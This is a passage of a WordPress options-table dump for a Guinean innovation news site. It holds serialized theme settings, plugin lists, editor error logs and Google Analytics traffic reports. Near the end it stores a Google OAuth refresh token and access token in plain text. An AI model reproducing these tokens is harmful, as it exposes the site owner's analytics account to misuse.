url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:16:\"botcont_ads_link\";s:0:\"\";s:22:\"botcont_ads_javascript\";s:0:\"\";s:11:\"footer_type\";s:7:\"default\";s:13:\"footer-layout\";s:14:\"3widget-footer\";s:11:\"footer-text\";s:177:\"<b style=\"color: #222222; font-family: sans-serif; font-size: 14px;\">©</b>2017 Guinée innovations - Propulsé par  <a href=\"http://www.nimbasolution.com/\">Nimba Solution</a>\";s:9:\"body-font\";a:7:{s:11:\"font-family\";s:4:\"Lato\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-backup\";s:0:\"\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:10:\"text-align\";s:0:\"\";}s:12:\"heading-font\";a:7:{s:11:\"font-family\";s:7:\"Poppins\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-backup\";s:0:\"\";s:11:\"font-weight\";s:3:\"500\";s:10:\"font-style\";s:0:\"\";s:10:\"text-align\";s:0:\"\";}s:9:\"menu-font\";a:7:{s:11:\"font-family\";s:7:\"Poppins\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-backup\";s:0:\"\";s:11:\"font-weight\";s:3:\"500\";s:10:\"font-style\";s:0:\"\";s:10:\"text-align\";s:0:\"\";}s:16:\"facebook_profile\";s:43:\"https://www.facebook.com/guineeinnovations/\";s:15:\"twitter_profile\";s:34:\"https://twitter.com/Gn_innovations\";s:14:\"google_profile\";s:0:\"\";s:16:\"linkedin_profile\";s:0:\"\";s:17:\"pinterest_profile\";s:0:\"\";s:15:\"dribble_profile\";s:0:\"\";s:14:\"flickr_profile\";s:0:\"\";s:15:\"behance_profile\";s:0:\"\";s:15:\"youtube_profile\";s:0:\"\";s:18:\"soundcloud_profile\";s:0:\"\";s:15:\"codepen_profile\";s:0:\"\";s:18:\"deviantart_profile\";s:0:\"\";s:12:\"digg_profile\";s:0:\"\";s:15:\"dropbox_profile\";s:0:\"\";s:14:\"github_profile\";s:0:\"\";s:17:\"instagram_profile\";s:0:\"\";s:13:\"skype_profile\";s:0:\"\";s:15:\"spotify_profile\";s:0:\"\";s:13:\"steam_profile\";s:0:\"\";s:14:\"trello_profile\";s:0:\"\";s:14:\"tumblr_profile\";s:0:\"\";s:13:\"vimeo_profile\";s:0:\"\";s:14:\"wechat_profile\";s:0:\"\";s:13:\"weibo_profile\";s:0:\"\";s:17:\"wordpress_profile\";s:0:\"\";s:12:\"xing_profile\";s:0:\"\";s:13:\"yahoo_profile\";s:0:\"\";s:12:\"yelp_profile\";s:0:\"\";}','yes'),(174,'magzma_framework-transients','a:3:{s:14:\"changed_values\";a:1:{s:14:\"head_ads_image\";a:5:{s:3:\"url\";s:90:\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Avec-le-Soutien-du-2.jpg\";s:2:\"id\";s:3:\"917\";s:6:\"height\";s:2:\"75\";s:5:\"width\";s:3:\"728\";s:9:\"thumbnail\";s:97:\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Avec-le-Soutien-du-2-150x75.jpg\";}}s:9:\"last_save\";i:1512719189;s:13:\"last_compiler\";i:1512719189;}','yes'),(180,'wbc_imported_demos','a:1:{s:12:\"wbc-import-7\";a:4:{s:9:\"directory\";s:7:\"demo-07\";s:12:\"content_file\";s:11:\"content.xml\";s:5:\"image\";s:16:\"screen-image.jpg\";s:8:\"imported\";s:8:\"imported\";}}','yes'),(182,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(183,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(184,'_elementor_global_css','a:3:{s:4:\"time\";i:1508766858;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:12;s:11:\"Roboto Slab\";}s:6:\"status\";s:4:\"file\";}','yes'),(187,'breadcrumbs_color','#000000','yes'),(188,'main_header','#205cd6','yes'),(189,'top_menu','#000000','yes'),(194,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(195,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(203,'_transient_timeout_elementor_remote_info_api_data_1.7.11','1508891923','no'),(204,'_transient_elementor_remote_info_api_data_1.7.11','a:2:{s:9:\"timestamp\";i:1508848722;s:14:\"upgrade_notice\";a:2:{s:7:\"version\";s:5:\"1.5.0\";s:7:\"message\";s:0:\"\";}}','no'),(267,'_site_transient_timeout_popular_importers_c68fa1edb79dadf9c291434151821529','1509044491','no'),(268,'_site_transient_popular_importers_c68fa1edb79dadf9c291434151821529','a:2:{s:9:\"importers\";a:8:{s:7:\"blogger\";a:4:{s:4:\"name\";s:7:\"Blogger\";s:11:\"description\";s:54:\"Import posts, comments, and users from a Blogger blog.\";s:11:\"plugin-slug\";s:16:\"blogger-importer\";s:11:\"importer-id\";s:7:\"blogger\";}s:9:\"wpcat2tag\";a:4:{s:4:\"name\";s:29:\"Categories and Tags Converter\";s:11:\"description\";s:71:\"Convert existing categories to tags or tags to categories, selectively.\";s:11:\"plugin-slug\";s:18:\"wpcat2tag-importer\";s:11:\"importer-id\";s:10:\"wp-cat2tag\";}s:11:\"livejournal\";a:4:{s:4:\"name\";s:11:\"LiveJournal\";s:11:\"description\";s:46:\"Import posts from LiveJournal using their API.\";s:11:\"plugin-slug\";s:20:\"livejournal-importer\";s:11:\"importer-id\";s:11:\"livejournal\";}s:11:\"movabletype\";a:4:{s:4:\"name\";s:24:\"Movable Type and TypePad\";s:11:\"description\";s:62:\"Import posts and comments from a Movable Type or TypePad blog.\";s:11:\"plugin-slug\";s:20:\"movabletype-importer\";s:11:\"importer-id\";s:2:\"mt\";}s:4:\"opml\";a:4:{s:4:\"name\";s:8:\"Blogroll\";s:11:\"description\";s:28:\"Import links in OPML format.\";s:11:\"plugin-slug\";s:13:\"opml-importer\";s:11:\"importer-id\";s:4:\"opml\";}s:3:\"rss\";a:4:{s:4:\"name\";s:3:\"RSS\";s:11:\"description\";s:30:\"Import posts from an RSS feed.\";s:11:\"plugin-slug\";s:12:\"rss-importer\";s:11:\"importer-id\";s:3:\"rss\";}s:6:\"tumblr\";a:4:{s:4:\"name\";s:6:\"Tumblr\";s:11:\"description\";s:53:\"Import posts &amp; media from Tumblr using their API.\";s:11:\"plugin-slug\";s:15:\"tumblr-importer\";s:11:\"importer-id\";s:6:\"tumblr\";}s:9:\"wordpress\";a:4:{s:4:\"name\";s:9:\"WordPress\";s:11:\"description\";s:96:\"Import posts, pages, comments, custom fields, categories, and tags from a WordPress export file.\";s:11:\"plugin-slug\";s:18:\"wordpress-importer\";s:11:\"importer-id\";s:9:\"wordpress\";}}s:10:\"translated\";b:0;}','no'),(269,'elementor_allow_tracking','no','yes'),(270,'elementor_tracker_notice','1','yes'),(273,'top_social','#777777','yes'),(284,'elementor_debug_log','a:10:{i:0;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1508918083\";s:7:\"message\";s:49:\"Cannot read property \\\'pageYOffset\\\' of undefined\";s:3:\"url\";s:356:\"https://guineeinnove.nimbasolution.com/wp-admin/load-scripts.php?c=0&load%5B%5D=underscore,shortcode,utils,jquery-core,jquery-migrate,backbone,wp-util,wp-backbone,media-models,plupload,wp-plupload,jquery-ui-c&load%5B%5D=ore,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,mediaelement,wp-mediaelement,media-views,media-editor,media-audiovideo&ver=4.8.2\";s:4:\"line\";s:2:\"12\";s:6:\"column\";s:5:\"30811\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:3;}i:1;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509371818\";s:7:\"message\";s:49:\"Cannot read property \\\'removeClass\\\' of undefined\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:6:\"104207\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:4;}i:2;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:90:\"Element `column` got <null> as `background_overlay_image` value. Expected array or object.\";}}i:3;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:99:\"Element `column` got <null> as `background_overlay_video_fallback` value. Expected array or object.\";}}i:4;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:90:\"Element `column` got <null> as `background_overlay_image` value. Expected array or object.\";}}i:5;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:99:\"Element `column` got <null> as `background_overlay_video_fallback` value. Expected array or object.\";}}i:6;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:90:\"Element `column` got <null> as `background_overlay_image` value. Expected array or object.\";}}i:7;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:99:\"Element `column` got <null> as `background_overlay_video_fallback` value. Expected array or object.\";}}i:8;a:7:{s:4:\"type\";s:13:\"SecurityError\";s:9:\"timestamp\";s:10:\"1509552437\";s:7:\"message\";s:183:\"Failed to read the \\\'contentDocument\\\' property from \\\'HTMLIFrameElement\\\': Blocked a frame with origin \\\"https://guineeinnove.nimbasolution.com\\\" from accessing a cross-origin frame.\";s:3:\"url\";s:356:\"https://guineeinnove.nimbasolution.com/wp-admin/load-scripts.php?c=0&load%5B%5D=underscore,shortcode,utils,jquery-core,jquery-migrate,backbone,wp-util,wp-backbone,media-models,plupload,wp-plupload,jquery-ui-c&load%5B%5D=ore,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,mediaelement,wp-mediaelement,media-views,media-editor,media-audiovideo&ver=4.8.3\";s:4:\"line\";s:2:\"10\";s:6:\"column\";s:5:\"26888\";s:12:\"customFields\";a:0:{}}i:9;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1511782320\";s:7:\"message\";s:49:\"Cannot read property \\\'removeClass\\\' of undefined\";s:3:\"url\";s:101:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.8.0\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:6:\"108151\";s:12:\"customFields\";a:0:{}}}','yes'),(316,'widget_do-etfw','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:10:{s:5:\"title\";s:0:\"\";s:21:\"twitter_timeline_type\";s:8:\"username\";s:23:\"twitter_widget_username\";s:14:\"Gn_innovations\";s:17:\"twitter_widget_id\";s:0:\"\";s:20:\"twitter_widget_width\";s:0:\"\";s:21:\"twitter_widget_height\";s:3:\"400\";s:26:\"twitter_widget_tweet_limit\";s:0:\"\";s:20:\"twitter_widget_theme\";s:5:\"light\";s:25:\"twitter_widget_link_color\";s:7:\"#3b94d9\";s:27:\"twitter_widget_border_color\";s:7:\"#f5f5f5\";}}','yes'),(317,'do_etfw_options','a:1:{s:14:\"twitter_script\";s:1:\"1\";}','yes'),(328,'_transient_timeout_custom_facebook_rating_notice_waiting','1511346828','no'),(329,'_transient_custom_facebook_rating_notice_waiting','waiting','no'),(330,'cff_rating_notice','pending','yes'),(332,'recently_activated','a:1:{s:25:\"wp-staging/wp-staging.php\";i:1512724739;}','yes'),(334,'_transient_timeout_plugin_slugs','1512812330','no'),(335,'_transient_plugin_slugs','a:13:{i:0;s:19:\"akismet/akismet.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:25:\"duplicator/duplicator.php\";i:3;s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";i:4;s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";i:5;s:23:\"elementor/elementor.php\";i:6;s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";i:7;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:8;s:9:\"hello.php\";i:9;s:26:\"popup-by-supsystic/pps.php\";i:10;s:35:\"redux-framework/redux-framework.php\";i:11;s:27:\"trackserver/trackserver.php\";i:12;s:24:\"wordpress-seo/wp-seo.php\";}','no'),(336,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(340,'cff_page_type','page','yes'),(359,'dpe_fp_widget_ver','3.5.0','yes'),(360,'dpe_fp_widget_db_ver','2','yes'),(361,'widget_dpe_fp_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(364,'far_plugin_settings','a:2:{s:7:\"farfind\";a:2:{i:1;s:49:\"<a href=\"http://www.magzma.com/\">Magzma Theme</a>\";i:2;s:37:\"\n				Powered by WordPress - Built by \";}s:10:\"farreplace\";a:2:{i:1;s:58:\"<a href=\"http://www.nimbasolution.com/\">Nimba Solution</a>\";i:2;s:60:\"\r\n				Cpoyright  Guinée innovations 2017 - Construit par:  \";}}','yes'),(387,'category_children','a:0:{}','yes'),(407,'bg_top','#ffffff','yes'),(408,'top_social_hover','','yes'),(604,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:36:\"admin@guineeinnove.nimbasolution.com\";s:7:\"version\";s:5:\"4.8.4\";s:9:\"timestamp\";i:1511987889;}','no'),(606,'akismet_spam_count','3','yes'),(614,'_amn_mi-lite_last_checked','1512691200','yes'),(615,'monsterinsights_over_time','a:3:{s:17:\"installed_version\";s:5:\"6.2.4\";s:14:\"installed_date\";i:1509462675;s:13:\"installed_pro\";b:0;}','yes'),(616,'monsterinsights_db_version','6.2.0','yes'),(617,'monsterinsights_settings_version','6.0.0','yes'),(618,'monsterinsights_current_version','6.2.4','yes'),(619,'monsterinsights_settings','a:26:{s:17:\"analytics_profile\";i:163802475;s:22:\"analytics_profile_code\";s:14:\"UA-109033166-1\";s:26:\"track_internal_as_outbound\";i:0;s:23:\"track_internal_as_label\";s:0:\"\";s:14:\"track_outbound\";i:1;s:14:\"allow_tracking\";i:0;s:13:\"tracking_mode\";s:9:\"analytics\";s:11:\"events_mode\";s:2:\"js\";s:12:\"demographics\";b:1;s:12:\"ignore_users\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:13:\"anonymize_ips\";b:1;s:17:\"track_download_as\";s:5:\"event\";s:19:\"extensions_of_files\";s:30:\"doc,exe,js,pdf,ppt,tgz,zip,xls\";s:18:\"subdomain_tracking\";s:0:\"\";s:16:\"tag_links_in_rss\";i:0;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:25:\"enhanced_link_attribution\";i:1;s:11:\"custom_code\";s:0:\"\";s:10:\"debug_mode\";i:0;s:13:\"save_settings\";a:0:{}s:12:\"view_reports\";a:0:{}s:22:\"analytics_profile_name\";s:48:\"Toutes les données du site Web (UA-109033166-1)\";s:13:\"oauth_version\";s:3:\"1.0\";s:13:\"cron_last_run\";i:1509669954;s:17:\"automatic_updates\";s:4:\"none\";}','yes'),(622,'monsterinsights_get_profiles','a:2:{i:100869257;a:4:{s:2:\"id\";s:9:\"100869257\";s:7:\"ua_code\";s:14:\"UA-100869257-1\";s:11:\"parent_name\";s:21:\"http://www.yeyamo.com\";s:5:\"items\";a:1:{i:147869367;a:3:{s:2:\"id\";s:14:\"UA-100869257-1\";s:4:\"name\";s:21:\"http://www.yeyamo.com\";s:5:\"items\";a:1:{i:152697971;a:3:{s:4:\"name\";s:48:\"Toutes les données du site Web (UA-100869257-1)\";s:7:\"ua_code\";s:14:\"UA-100869257-1\";s:2:\"id\";s:9:\"152697971\";}}}}}i:109033166;a:4:{s:2:\"id\";s:9:\"109033166\";s:7:\"ua_code\";s:14:\"UA-109033166-1\";s:11:\"parent_name\";s:37:\"http://guineeinnove.nimbasolution.com\";s:5:\"items\";a:1:{i:162840784;a:3:{s:2:\"id\";s:14:\"UA-109033166-1\";s:4:\"name\";s:37:\"http://guineeinnove.nimbasolution.com\";s:5:\"items\";a:1:{i:163802475;a:3:{s:4:\"name\";s:48:\"Toutes les données du site Web (UA-109033166-1)\";s:7:\"ua_code\";s:14:\"UA-109033166-1\";s:2:\"id\";s:9:\"163802475\";}}}}}}','yes'),(623,'monsterinsights_lite_access_token','a:5:{s:13:\"refresh_token\";s:66:\"1/8mob9vfs4b3XH0-x0njWXOTwTl7PWEPetaBNkmF5A1aBml0Dg363NAHiWfdinJHQ\";s:12:\"access_token\";s:132:\"ya29.Gl0cBenxtbHp6lkLVI-Hi_01M_hFtXkc6T8wvLDplrHcR6wnxrc_cIPUfeAJcmL0kHbL7B2LDwOowEkkEGiQw2ynESN7Om5AYLJP9NCqT8SBO14jsmdVTTnHTODYOQ8\";s:7:\"expires\";i:1512726151;s:10:\"expires_in\";i:3600;s:7:\"created\";i:1512722551;}','yes'),(624,'monsterinsights_lite_refresh_token','1/8mob9vfs4b3XH0-x0njWXOTwTl7PWEPetaBNkmF5A1aBml0Dg363NAHiWfdinJHQ','yes'),(625,'monsterinsights_report_overview_pageviews','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:31:{i:0;a:2:{i:0;s:8:\"20171003\";i:1;s:1:\"0\";}i:1;a:2:{i:0;s:8:\"20171004\";i:1;s:1:\"0\";}i:2;a:2:{i:0;s:8:\"20171005\";i:1;s:1:\"0\";}i:3;a:2:{i:0;s:8:\"20171006\";i:1;s:1:\"0\";}i:4;a:2:{i:0;s:8:\"20171007\";i:1;s:1:\"0\";}i:5;a:2:{i:0;s:8:\"20171008\";i:1;s:1:\"0\";}i:6;a:2:{i:0;s:8:\"20171009\";i:1;s:1:\"0\";}i:7;a:2:{i:0;s:8:\"20171010\";i:1;s:1:\"0\";}i:8;a:2:{i:0;s:8:\"20171011\";i:1;s:1:\"0\";}i:9;a:2:{i:0;s:8:\"20171012\";i:1;s:1:\"0\";}i:10;a:2:{i:0;s:8:\"20171013\";i:1;s:1:\"0\";}i:11;a:2:{i:0;s:8:\"20171014\";i:1;s:1:\"0\";}i:12;a:2:{i:0;s:8:\"20171015\";i:1;s:1:\"0\";}i:13;a:2:{i:0;s:8:\"20171016\";i:1;s:1:\"0\";}i:14;a:2:{i:0;s:8:\"20171017\";i:1;s:1:\"0\";}i:15;a:2:{i:0;s:8:\"20171018\";i:1;s:1:\"0\";}i:16;a:2:{i:0;s:8:\"20171019\";i:1;s:1:\"0\";}i:17;a:2:{i:0;s:8:\"20171020\";i:1;s:1:\"0\";}i:18;a:2:{i:0;s:8:\"20171021\";i:1;s:1:\"0\";}i:19;a:2:{i:0;s:8:\"20171022\";i:1;s:1:\"0\";}i:20;a:2:{i:0;s:8:\"20171023\";i:1;s:1:\"0\";}i:21;a:2:{i:0;s:8:\"20171024\";i:1;s:1:\"0\";}i:22;a:2:{i:0;s:8:\"20171025\";i:1;s:1:\"0\";}i:23;a:2:{i:0;s:8:\"20171026\";i:1;s:1:\"0\";}i:24;a:2:{i:0;s:8:\"20171027\";i:1;s:1:\"0\";}i:25;a:2:{i:0;s:8:\"20171028\";i:1;s:1:\"0\";}i:26;a:2:{i:0;s:8:\"20171029\";i:1;s:1:\"0\";}i:27;a:2:{i:0;s:8:\"20171030\";i:1;s:1:\"0\";}i:28;a:2:{i:0;s:8:\"20171031\";i:1;s:3:\"108\";}i:29;a:2:{i:0;s:8:\"20171101\";i:1;s:3:\"157\";}i:30;a:2:{i:0;s:8:\"20171102\";i:1;s:3:\"193\";}}}','yes'),(626,'monsterinsights_report_overview_top_content','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:26:{i:0;a:2:{i:0;s:80:\"/2017/10/24/un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie/\";i:1;s:3:\"214\";}i:1;a:2:{i:0;s:84:\"/2017/10/26/alpha-mamadou-diallo-cree-une-plateforme-pour-faciliter-lacces-au-livre/\";i:1;s:3:\"122\";}i:2;a:2:{i:0;s:76:\"/2017/10/26/une-plateforme-dinformations-sur-les-procedures-administratives/\";i:1;s:2:\"51\";}i:3;a:2:{i:0;s:1:\"/\";i:1;s:2:\"14\";}i:4;a:2:{i:0;s:99:\"/2017/10/24/diallo-thierno-mamadou-djan-concepteur-dune-maquette-dun-feu-de-croisement-intelligent/\";i:1;s:1:\"6\";}i:5;a:2:{i:0;s:79:\"/2017/11/01/lemine-camara-utilise-feuilles-de-kola-regenerer-terres-infertiles/\";i:1;s:1:\"6\";}i:6;a:2:{i:0;s:55:\"/2017/10/26/kerfalla-camara-cree-le-cafe-ziama-macenta/\";i:1;s:1:\"4\";}i:7;a:2:{i:0;s:134:\"/2017/10/30/alpha-oumar-gagne-le-concours-national-de-dessin-et-de-peinture-organise-par-la-delegation-de-lunion-europeenne-en-guinee/\";i:1;s:1:\"4\";}i:8;a:2:{i:0;s:84:\"/2017/11/01/ibrahima-soumano-cree-plateforme-universelle-de-recharges-telephoniques/\";i:1;s:1:\"4\";}i:9;a:2:{i:0;s:19:\"/category/economie/\";i:1;s:1:\"4\";}i:10;a:2:{i:0;s:53:\"/2017/10/26/sambako-et-sa-petite-revolution-agricole/\";i:1;s:1:\"3\";}i:11;a:2:{i:0;s:98:\"/2017/11/01/alpha-amadou-diallo-cree-application-aider-compatriotes-a-se-deplacer-plus-facilement/\";i:1;s:1:\"3\";}i:12;a:2:{i:0;s:181:\"/404.html?page=/wp-content/uploads/2017/10/architecte.jpg&from=https://guineeinnove.nimbasolution.com/2017/10/24/un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie/\";i:1;s:1:\"3\";}i:13;a:2:{i:0;s:22:\"/category/agriculture/\";i:1;s:1:\"3\";}i:14;a:2:{i:0;s:22:\"/category/technologie/\";i:1;s:1:\"3\";}i:15;a:2:{i:0;s:49:\"/2017/10/26/mamoudou-diallo-createur-de-quizz224/\";i:1;s:1:\"2\";}i:16;a:2:{i:0;s:66:\"/2017/10/30/fatou-thithi-camara-creee-un-carnet-de-sante-digitale/\";i:1;s:1:\"2\";}i:17;a:2:{i:0;s:13:\"/technologie/\";i:1;s:1:\"2\";}i:18;a:2:{i:0;s:97:\"/2017/10/24/electricite-un-homme-invente-un-micro-barrage-de-9kva-dans-une-localite-de-gueckedou/\";i:1;s:1:\"1\";}i:19;a:2:{i:0;s:55:\"/2017/10/26/une-marque-de-vetements-de-sport-en-guinee/\";i:1;s:1:\"1\";}i:20;a:2:{i:0;s:40:\"/2017/10/30/sekou-lamine-coyah-bangoura/\";i:1;s:1:\"1\";}i:21;a:2:{i:0;s:83:\"/2017/11/01/fatoumata-cherif-cree-plateforme-de-medias-ligne-developpement-durable/\";i:1;s:1:\"1\";}i:22;a:2:{i:0;s:18:\"/category/culture/\";i:1;s:1:\"1\";}i:23;a:2:{i:0;s:16:\"/category/sante/\";i:1;s:1:\"1\";}i:24;a:2:{i:0;s:18:\"/category/societe/\";i:1;s:1:\"1\";}i:25;a:2:{i:0;s:11:\"/contact-2/\";i:1;s:1:\"1\";}}}','yes'),(627,'monsterinsights_report_overview_top_sources','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:7:{i:0;a:2:{i:0;s:14:\"m.facebook.com\";i:1;s:3:\"311\";}i:1;a:2:{i:0;s:8:\"(direct)\";i:1;s:2:\"81\";}i:2;a:2:{i:0;s:12:\"facebook.com\";i:1;s:2:\"41\";}i:3;a:2:{i:0;s:14:\"l.facebook.com\";i:1;s:2:\"10\";}i:4;a:2:{i:0;s:15:\"lm.facebook.com\";i:1;s:1:\"9\";}i:5;a:2:{i:0;s:6:\"google\";i:1;s:1:\"3\";}i:6;a:2:{i:0;s:16:\"web.facebook.com\";i:1;s:1:\"3\";}}}','yes'),(628,'monsterinsights_report_overview_countries','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:25:{i:0;a:2:{i:0;s:2:\"GN\";i:1;s:3:\"262\";}i:1;a:2:{i:0;s:2:\"FR\";i:1;s:2:\"64\";}i:2;a:2:{i:0;s:2:\"US\";i:1;s:2:\"23\";}i:3;a:2:{i:0;s:2:\"CH\";i:1;s:2:\"20\";}i:4;a:2:{i:0;s:2:\"CM\";i:1;s:2:\"11\";}i:5;a:2:{i:0;s:2:\"MA\";i:1;s:2:\"11\";}i:6;a:2:{i:0;s:2:\"DE\";i:1;s:2:\"10\";}i:7;a:2:{i:0;s:2:\"TD\";i:1;s:1:\"7\";}i:8;a:2:{i:0;s:2:\"TR\";i:1;s:1:\"7\";}i:9;a:2:{i:0;s:2:\"CA\";i:1;s:1:\"6\";}i:10;a:2:{i:0;s:2:\"RU\";i:1;s:1:\"6\";}i:11;a:2:{i:0;s:2:\"CI\";i:1;s:1:\"5\";}i:12;a:2:{i:0;s:2:\"AO\";i:1;s:1:\"3\";}i:13;a:2:{i:0;s:2:\"DZ\";i:1;s:1:\"3\";}i:14;a:2:{i:0;s:2:\"GH\";i:1;s:1:\"3\";}i:15;a:2:{i:0;s:2:\"SN\";i:1;s:1:\"3\";}i:16;a:2:{i:0;s:2:\"GR\";i:1;s:1:\"2\";}i:17;a:2:{i:0;s:2:\"GW\";i:1;s:1:\"2\";}i:18;a:2:{i:0;s:2:\"NG\";i:1;s:1:\"2\";}i:19;a:2:{i:0;s:2:\"PE\";i:1;s:1:\"2\";}i:20;a:2:{i:0;s:2:\"TN\";i:1;s:1:\"2\";}i:21;a:2:{i:0;s:2:\"BE\";i:1;s:1:\"1\";}i:22;a:2:{i:0;s:2:\"CY\";i:1;s:1:\"1\";}i:23;a:2:{i:0;s:2:\"ES\";i:1;s:1:\"1\";}i:24;a:2:{i:0;s:2:\"MR\";i:1;s:1:\"1\";}}}','yes'),(629,'monsterinsights_tracking_notice','1','yes'),(637,'wpseo','a:25:{s:14:\"blocking_files\";a:0:{}s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:5:\"5.7.1\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onp